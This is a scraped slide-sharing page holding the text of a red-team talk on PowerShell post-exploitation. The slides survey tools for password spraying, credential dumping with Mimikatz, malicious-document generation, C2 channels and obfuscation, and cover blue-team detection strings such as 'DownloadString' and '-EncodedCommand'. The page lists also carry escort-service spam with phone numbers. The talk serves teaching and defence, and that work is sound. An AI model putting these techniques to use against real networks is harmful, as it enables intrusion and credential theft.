Lateral Movement - Phreaknik 2016
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
 
Hogy jussunk ki lezárt hálózatokból?
Hogy jussunk ki lezárt hálózatokból?Hogy jussunk ki lezárt hálózatokból?
Hogy jussunk ki lezárt hálózatokból?
 
Bsides tampa
Bsides tampaBsides tampa
Bsides tampa
 
Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018
 
Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
 
Owning computers without shell access 2
Owning computers without shell access 2Owning computers without shell access 2
Owning computers without shell access 2
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
 
PowerShell Defcon for Cybersecurity Topics
PowerShell Defcon for Cybersecurity TopicsPowerShell Defcon for Cybersecurity Topics
PowerShell Defcon for Cybersecurity Topics
 
24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAs24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAs
 
PowerShellForDBDevelopers
PowerShellForDBDevelopersPowerShellForDBDevelopers
PowerShellForDBDevelopers
 
Protect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying TechniquesProtect Your Payloads: Modern Keying Techniques
Protect Your Payloads: Modern Keying Techniques
 
Road to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoopsRoad to Opscon (Pisa '15) - DevOoops
Road to Opscon (Pisa '15) - DevOoops
 
Malware Analysis Using Free Software
Malware Analysis Using Free SoftwareMalware Analysis Using Free Software
Malware Analysis Using Free Software
 
Enemy at the gates: vulnerability research in embedded appliances
Enemy at the gates: vulnerability research in embedded appliances Enemy at the gates: vulnerability research in embedded appliances
Enemy at the gates: vulnerability research in embedded appliances
 
#WeSpeakLinux Session
#WeSpeakLinux Session#WeSpeakLinux Session
#WeSpeakLinux Session
 
$kernel->infect(): Creating a cryptovirus for Symfony2 apps
$kernel->infect(): Creating a cryptovirus for Symfony2 apps$kernel->infect(): Creating a cryptovirus for Symfony2 apps
$kernel->infect(): Creating a cryptovirus for Symfony2 apps
 
Offensive Python for Pentesting
Offensive Python for PentestingOffensive Python for Pentesting
Offensive Python for Pentesting
 

Mehr von Arthur Paixão

Porque Investir em um time de segurança ofensiva?
Porque Investir em um time de segurança ofensiva?Porque Investir em um time de segurança ofensiva?
Porque Investir em um time de segurança ofensiva?Arthur Paixão
 
Red Team Diary: Meu Recon falhou e agora?
Red Team Diary: Meu Recon falhou e agora?Red Team Diary: Meu Recon falhou e agora?
Red Team Diary: Meu Recon falhou e agora?Arthur Paixão
 
Como se tornar JEDI em desafios de Capture the Flag
Como se tornar JEDI em desafios de Capture the FlagComo se tornar JEDI em desafios de Capture the Flag
Como se tornar JEDI em desafios de Capture the FlagArthur Paixão
 
Modern Healthcare Hacking
Modern Healthcare HackingModern Healthcare Hacking
Modern Healthcare HackingArthur Paixão
 
[IN]Segurança em Hospitais
[IN]Segurança em Hospitais[IN]Segurança em Hospitais
[IN]Segurança em HospitaisArthur Paixão
 
Monitoramento de malware em Windows NT 6.x - 64bits
Monitoramento de malware em Windows NT 6.x - 64bitsMonitoramento de malware em Windows NT 6.x - 64bits
Monitoramento de malware em Windows NT 6.x - 64bitsArthur Paixão
 

Mehr von Arthur Paixão (7)

Porque Investir em um time de segurança ofensiva?
Porque Investir em um time de segurança ofensiva?Porque Investir em um time de segurança ofensiva?
Porque Investir em um time de segurança ofensiva?
 
Red Team Diary: Meu Recon falhou e agora?
Red Team Diary: Meu Recon falhou e agora?Red Team Diary: Meu Recon falhou e agora?
Red Team Diary: Meu Recon falhou e agora?
 
Como se tornar JEDI em desafios de Capture the Flag
Como se tornar JEDI em desafios de Capture the FlagComo se tornar JEDI em desafios de Capture the Flag
Como se tornar JEDI em desafios de Capture the Flag
 
Modern Healthcare Hacking
Modern Healthcare HackingModern Healthcare Hacking
Modern Healthcare Hacking
 
[IN]Segurança em Hospitais
[IN]Segurança em Hospitais[IN]Segurança em Hospitais
[IN]Segurança em Hospitais
 
Investigando email
Investigando emailInvestigando email
Investigando email
 
Monitoramento de malware em Windows NT 6.x - 64bits
Monitoramento de malware em Windows NT 6.x - 64bitsMonitoramento de malware em Windows NT 6.x - 64bits
Monitoramento de malware em Windows NT 6.x - 64bits
 

Kürzlich hochgeladen

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 

Kürzlich hochgeladen (20)

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 

PowerShell Post-Exploitation Techniques

  • 2. PS C:> whoami.ps1_ • Arthur Paixão • Red Team Security Specialist – C6 Bank • Information Security - UNIFG • Analysis Systems Development – UNIBRATEC • Made in Recife #Oxem? #TuVisse? • Security Research at #RTFM
  • 3. PS C:> Powershell.exe KEEP CALM AND LEARN POWERSHELL
  • 4. PS C:> overview.ps1_ Why use Powershell? Native on Windows .NET Framework Easy to learn Execute code in memory Command- line Shell and Script PowerShell ISE
  • 5. PS C:> syntax-overview.ps1_ Poweliks Kovter (mshta or rundll + ActiveXObject) Registry: .ps1 .vbs .bat Scheduled task File: Word Excel Macros: PowerShell Remoting PsExec WMI Remotely:
  • 7. PS C:> syntax-overview.ps1_ OBJECTS Properties Methods ARRAYS $list = “From”, “Power”, “To”, “Shell” $list[0] $list[1] $list[2] $list[3] “From Power To Shell” CMDLETS Always in a “verb-noun” format get-process get-eventlog write-host set-clipboard
  • 8. PS C:> syntax-overview.ps1_ Basic CmdLets PowerShell PowerShell Alias CMD *nix Get-ChildItem ls, gci, dir dir ls Copy-Item cp, copy, cpi copy cp Move-Item move, mv, mi move mv Select-String sls find, findstr grep Get-Help man, help help man Get-Content cat, gcc, type type cat
  • 9. PS C:> syntax-overview.ps1_ • Creates a new resource New • Modifies an existing resource Set- • Retrieves an existing resource Get- • Gets information from a source, such as a file Read- • Used to look for an object Find- • Used to create a reference to a resource Search- • (asynchronous) begin an operation, such as starting a process Start- • (synchronous) perform an operation such as running a command Invoke-
  • 10. PS C:> syntax-verview.ps1_ Get-Help Default output isn’t really useful Get-Help ls –ex Get-Help ls -Full Get-Command Very useful for find cmdlet Get-Command Get-Help Get-Command Set-Acl
  • 12. PS C:> Invoke-BypassExecutionPolicy.ps1_ • Runme.ps1 • Write-Host "My voice is my passport, verify me."
  • 13. PS C:> Powershell.exe RED TEAM != BLUE TEAM
  • 14. PS C:> Get-Help-RedTeam.ps1_ • PowerShell is what the admins use to manage their infrastructure; • Standard on Windows 7 and up; • Microsoft is pushing more and more tasks into PowerShell; • PowerShell can be used in every part of the attack lifecycle; • Access to entire .NET and WMI frameworks; • Lots of very interesting offensive projects going on;
  • 15. PS C:> Get-Help-BlueTeam.ps1_ • It’s what the bad guys (RedTeams) are using; • There’s some really cool DFIR stuff going on with Powershell; • Module Logging (v3); • Script Block Logging (v5); • Full Transcription Logging (v2, impoved in v5); • Preventing and Monitore downgrade attacks; • Monitor and alert on certain strings/commands in command line arguments for powershell.exe • -EncodedCommand • (New-Object Net.WebClient).DownloadString PS C:> Get-Help-BlueTeam.ps1_ • It’s what the bad guys (RedTeams) are using; • There’s some really cool DFIR stuff going on with Powershell; • Module Logging (v3); • Script Block Logging (v5); • Full Transcription Logging (v2, impoved in v5); • Preventing and Monitore downgrade attacks; • Monitor and alert on certain strings/commands in command line arguments for powershell.exe • -EncodedCommand • (New-Object Net.WebClient).DownloadString
  • 17. PS C:> Get-Attack-Scenario.ps1_ Reconnaissance Scanning Gaining Access Maintaining Access Covering Tracks Reporting Scanning += Remote Attacks PPP – Phishing Powshell Payloads Command and Control Privilege Escalation Network Exploitation += Domain Exploitation Post Exploitation
  • 18. PS C:> Get-Attack.ps1 SCANNING += REMOTE ATTACKS
  • 19. PS C:> PSNmap.ps1_ • Linux nmap for PowerShell (almost). • Ping sweeps and scans a network for specified open ports. • Can also perform DNS lookups. • Author(s) • @joakimbs • https://www.powershellgallery.com/packages/PSnmap/1.2
  • 20. PS C:> PowerMeta.ps1_ • Discover publicly available files • Extract Metadata from them • Can provide information about: • The internal username schema • System names • Domain info • Author(s): • Beau Bullock (@dafthack) • https://github.com/dafthack/PowerMeta Full Names Possible Username
  • 21. PS C:> OWAAttackFlow.ps1_ Starting With Nothing and 100% Remote Reconnaissance OWA Target Aquisition Internal Domain Enumeration Username Contention Discovery Username Enumeration Password Spraying Acquire Global Address List More Password Spraying 2FA Bypass to Search Email Congratulation, now you're H4ck3R!!!
  • 22. PS C:> MailSniper.ps1_ • Enumerate users/domain • Password spray OWA/EWS • Get Global Address List • Search email for certain terms • Passwords • Find VPN info • Reset 2FA keys or add new device • Author(s): • Beau Bullock (@dafthack) • https://github.com/dafthack/MailSniper
  • 23. PS C:> Get-Attack.ps1 PPP – PHISHING POWERSHELL PAYLOADS
  • 24. PS C:> PowerShell-Empire.ps1_ • PowerShell post-exploitation agent • Aims to provide a rapidly extensible platform to integrate offensive/defensive PowerShell work • Many capabilities: • Stagers/payloads, Lateral movement, persistence, etc. • Author(s): • Will Schroeder (@harmj0y) • Justin Warner (@sixdub) • Matt Nelson (@enigma0x3) • www.powershellempire.com
  • 25. PS C:> LuckyStrike.ps1_ • PowerShell based generator of malicious .doc and .xls documents; • All payloads are saved into a database for easy retrieval & embedding into a new or existing document; • Is a menu-driven PowerShell script that uses a sqlite database to store your payloads, code block dependencies, and working sessions in order to generate malicious documents. • Author(s): • Jason Lang (@curi0usJack) • https://github.com/curi0usJack/luckystrike
  • 27. PS C:> Invoke-C&C.ps1_ • Powercat - PowerShell version of Netcat; • Author(s): • Mick Douglas (@besimorhino), Luke Baggett & Jesse Davis (@secabstraction) • https://github.com/secabstraction/PowerCat • Invoke-PowerShellIcmp – C2 channel over ICMP echoes and replies; • Author(s): • Nikhil Mittal (@samratashok) • https://github.com/samratashok/nishang/blob/master/ Shells/Invoke- PowerShellIcmp.ps1 • Dnscat2-PowerShell – C2 channel over DNS requests; • Author(s): • Ron Bowes (@iagox86) • https://github.com/lukebaggett/dnscat2-powershell
  • 29. PS C:> PowerUp.ps1_ • Performs a number of local privilege escalation checks • Checks for: • Unquoted service paths • Unattended Install Files • Service Permissions • Author(s): • Will Schroeder (@harmj0y) • https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
  • 30. PS C:> PowerUpSQL.ps1_ • SQL server discovery • Audit weak configurations • Perform privilege escalation to obtain SA privileges • Find sensitive data at scale • Attacks Funcions: • Invoke-SQLDumpInfo • Invoke-SQLAudit • Invoke-SQLEscalatePriv • Author(s): • ScottSutherland(@_nullbind) • https://github.com/NetSPI/PowerUpSQL
  • 32. PS C:> Get-GPPPassword.ps1_ • Finds any passwords of accounts set by GPP • Usually the first thing I check • Almost always find an admin password here • Author(s): • Chris Campbell (@obscuresec) • https://github.com/PowerShellMafia/PowerSplo it/blob/master/Exfiltration/Get- GPPPassword.ps1
  • 33. PS C:> BloodHound.ps1_ • Enumerates/Gathers: • Local admins group on all systems • Active user sessions on each system • Group membership information • Domain trusts info • Find a path to domain admin • Authors(s): • Andrew Robbins (@_wald0), Will Schroeder (@harmj0y) and Rohan Vazarkar (@CptJesus) • https://github.com/BloodHoundAD/BloodHound • https://github.com/SadProcessor/SomeStuff/blob/ master/BloodHoundw64_LTI.ps1 [Windows Edition]
  • 34. PS C:> Find-LocalAdminAccess.ps1_ • Find a system on the network your user is a local admin of; • Author(s): • Will Schroeder (@harmj0y) • https://github.com/Powe rShellMafia/PowerSploit/ blob/master/Recon/Powe rView.ps1
  • 35. PS C:> Find-LocalAdminAccess.ps1_ • Tool for password spraying all domain users • Common Scenario: • Domain locks out accounts after a certain number of failed logins • Can’t brute force • Solution: • Try a number of passwords less than the domain lockout policy against EVERY account in the domain • Author(s): • Beau Bullock (@dafthack) • https://github.com/dafthack/Do mainPasswordSpray
  • 37. PS C:> Invoke-Mimikatz.ps1_ • Dump cleartext credentials • Avoids writing to disk • Could sneakily dump creds from LSASS dumps from other systems • Author(s): • Joe Bialek (@JosephBialek) • Benjamin Delpy (@gentilkiwi) • https://raw.githubusercontent.com/PowerShellMafia/Power Sploit/master/Exfiltration/Invoke-Mimikatz.ps1
  • 38. PS C:> Invoke-ShareFinder.ps1_ • Sensitive files on shares? • ShareFinder then FileFinder • FileFinder will find files with the following strings in their title: • ‘*pass*’, ‘*sensitive*’, ‘*admin*’, ‘*secret*’, ‘*login*’, ‘*unattend*.xml’, ‘*.vmdk’, ‘*creds*’, or ‘*credential*’ • Author(s): • Will Schroeder (@harmj0y)
  • 42. PS C:> PowerOps.exe_ • C# application that has many • PowerShell scripts built in: • PowerSploit • Nishang • GPPPassword • Empire • PowerCat • Author(s): • Rui Reis (@fdiskyou) • https://github.com/fdiskyou/PowerOPS
  • 43. PS C:> PowerShdll.ps1_ • Run PowerShell with dlls only. Does not require access to powershell.exe as it uses powershell automation dlls. • Requirements: • .Net v3.5 for dll mode. • .Net v2.0 for exe mode. • https://github.com/p3nt4/PowerShdll DLL Mode: EXE Mode:
  • 44. PS C:> PowerLessShell.py_ • PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach. • To add another layer of crap the payload will copy msbuild.exe to something random and build the payload using the randomly generated binary. • You can provide -knownprocess switch to use known Windows process name instead of renaming MsBuild.exe to something random • https://github.com/Mr-Un1k0d3r/PowerLessShell
  • 46. PS C:> Invoke-BypassExecutionPolicy.ps1_ • Paste the Script into an Interactive PowerShell Console: • Use the Command Switch:
  • 47. PS C:> Invoke-BypassExecutionPolicy.ps1_ • Use the Invoke-Command Command: • Use the Invoke-Expression Command:
  • 48. PS C:> Invoke-BypassExecutionPolicy.ps1_ • Set the ExcutionPolicy for the CurrentUser Scope via the Registry • https://blog.netspi.com/15-ways-to-bypass-the- powershell-execution-policy/ • https://docs.microsoft.com/en- us/powershell/module/microsoft.powershell.security/set- executionpolicy?view=powershell-5.1
  • 50. PS C:> S3t-0+‘B’+fu$C4t|0n.ps1_ • Command line args are what most monitoring tools alert on when powershell.exe is run • ‘LeT’+’s’+’ob’+’FusCa’+’te’ • Encode, concatenate, reorder, etc. • Author(s): • Daniel Bohannon (@danielbohannon) • https://github.com/danielbohannon/Invoke-Obfuscation
  • 51. PS C:> ISESteriods.ps1_ • ISESteroids 2.5.1.0 now ships with a PowerShell obfuscator that can scramble your code and make it hard to reverse- engineer; • To obfuscate a script, simply load a script and choose Tools/Obfuscate; • Dialog where you can set the level of obfuscation; • http://www.powertheshell.com/powershell-obfuscator/
  • 53. PS C:> Nishang.ps1_ • Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. • Nishang is useful during all phases of penetration testing. • ActiveDirectory • Antak - the Webshell • Backdoor • Bypass • Clients • Escalation • MITM • Pivot • https://github.com/samratashok/nishang
  • 54. PS C:> PowerSploit.ps1_ • PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts: • Recon / CodeExecution • ScriptModification • Persistence • AntivirusBypass • Exfiltration • Mayhen =) • PrivEsc • https://github.com/PowerShellMafia/Po werSploit
  • 55. PS C:> PS>Attack.ps1_ • PS>Attack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. • It's designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams. • Contains over 100 commands for Privilege Escalation, Recon and Data Exfilitration. It does this by including the following modules and commands: • PowerSploit • Nishang • Powercat • Inveigh • Invoke-TheHash • https://github.com/jaredhaight/PSAttack
  • 56. PS C:> Get-Mitigation.ps1 SURPRISE, YOU’RE BUSTED! DOU YOU REALLY?
  • 57. PS C:> Get-Mitigation.ps1_ •cmd.exe •PowerShell.exe •PowerShell_ISE.exe Disable: Use AppWhitelisting. Use Sysmon to monitor and alert for System.Management.Automation.dll Could possibly disable csc.exe compilation tool. Remove PowerShell v2 and Install PowerShell v5. Constrained Language Mode
  • 58. PS C:> Get-Mitigation.ps1_ • Possible Bypass! Disable: • Possible Bypass! Use AppWhitelisting. • Possible Bypass! Use Sysmon to monitor and alert for System.Management.Automation.dll • Dangerous! Could possibly disable csc.exe compilation tool. Remove PowerShell v2 and Install PowerShell v5. • PS C:> $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage" Constrained Language Mode
  • 59. PS C:> Get-Mitigation.ps1_ • https://goo.gl/fPCiJn Add Power to your PowerShell @techmentorevents • https://github.com/WiredPulse/PowerShell PowerScripts @WiredPulse • https://github.com/WiredPulse/PoSh-R2 PoSh-R2 @WiredPulse • https://github.com/sans-blue-team/DeepBlueCLI DeepBlueCLI @sans-blue-team • https://github.com/davehull/Kansa Kansas @davehull • https://github.com/mattifestation/PowerShellArsenal PowerShellArsenal @MattGraeber
  • 62. PS C:> Invoke-References.ps1_ • https://github.com/PowerShellMafia/PowerSp loit/tree/dev/ • https://gallery.technet.microsoft.com/Net- Cease-Blocking-Net-1e8dcb5b • https://gallery.technet.microsoft.com/SAMRi1 0-Hardening-Remote-48d94b5b • https://github.com/davehull/Kansa • https://github.com/Invoke-IR/Uproot • https://github.com/mattifestation/PowerShell Arsenal • https://github.com/mattifestation/PSReflect • https://github.com/PowerShellEmpire/PowerT ools/tree/master/PowerPick • https://pt.slideshare.net/dafthack/pwning- the-enterprise-with-powershell • http://lockboxx.blogspot.com.br/2016/03/po wershell-for-pentesters-course.html • https://media.blackhat.com/eu- 13/briefings/Mittal/bh-eu-13-powershell-for- penetration-mittal-slides.pdf • https://www.psattack.com/presentations/get- help-an-intro-to-powershell-and-how-to-use- it-for-evil/ • https://pt.slideshare.net/harmj0y/catch-me-if- you-can-powershell-red-vs-blue • https://pt.slideshare.net/harmj0y/building-an- empire-with-powershell • https://www.youtube.com/watch?v=uE8IAxM _BhE